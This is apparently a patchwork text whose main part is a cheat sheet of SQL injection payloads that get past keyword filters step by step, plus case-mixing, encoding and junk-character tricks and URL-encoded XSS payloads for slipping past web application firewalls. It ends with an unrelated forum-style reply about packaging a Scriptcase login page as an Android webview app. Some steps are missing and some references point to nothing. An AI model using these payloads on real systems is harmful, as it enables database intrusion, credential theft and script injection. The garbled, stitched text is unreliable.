Possible regex: preg_match('/(and|or|union)/i', $id)
Blocked statement: union select user, password from users
Bypass statement: 1 || (select user from users where user_id = 1) = 'admin'

Blocked statement: 1 || (select user from users where user_id = 1) = 'admin'
Bypass statement: 1 || (select user from users limit 1) = 'admin'

Step 3: filtered keywords: and, or, union, where, limit.
Blocked statement: 1 || (select user from users limit 1) = 'admin'
Bypass statement: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

Step 4: filtered keywords: and, or, union, where, limit, group by.
Blocked statement: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypass statement: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1

Step 5: filtered keywords: and, or, union, where, limit, group by, select.
Blocked statement: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
Bypass statement: 1 || 1 = 1 into outfile 'result.txt'

Step 7: filtered keywords: and, or, union, where, limit, group by, select, ', hex.
Step 8: filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr.
Step 9: filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr, white space.

Standard: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
Bypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'
Bypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
TIP: see this and this reports on HackerOne. :)

Mixed encoding: Sometimes, WAF rules often tend to filter out a specific type of encoding. This type of filter can be bypassed by mixed-encoding payloads. Tabs and newlines further add to obfuscation.

Obfuscated: %253Cscript%253Ealert()%253C%252Fscript%253E
Bash allows path concatenation for execution.

Junk characters: Normal payloads get filtered out easily. Adding some junk chars helps avoid detection (specific cases only).

Maybe not what you are searching but let me know if it works for you.
Easily (cheating, using app inventor) make an android app that stores user and password of the user and the web address of your scriptcase app server (the app has an android installer, can be placed on an app store, and has its own icon on the android mobile screen). Then the app opens a webviewer (a web browser without url bar and all the stuff, just the web area, so the user thinks that he is watching an app); the webview points to your web server address login app. The android app sends user and password to your scriptcase login app. Your scriptcase login app "catches" the user and password and processes your login. Then your user automatically in one second gets into your scriptcase apps (just as the user would in a web browser, but the user feels he is using an android app). *** the trick… the android app is made using app inventor; it is free and super easy to "learn" (you don't learn so much, you can make the app in a single evening or so) with a drag and drop system, it's free and opensource.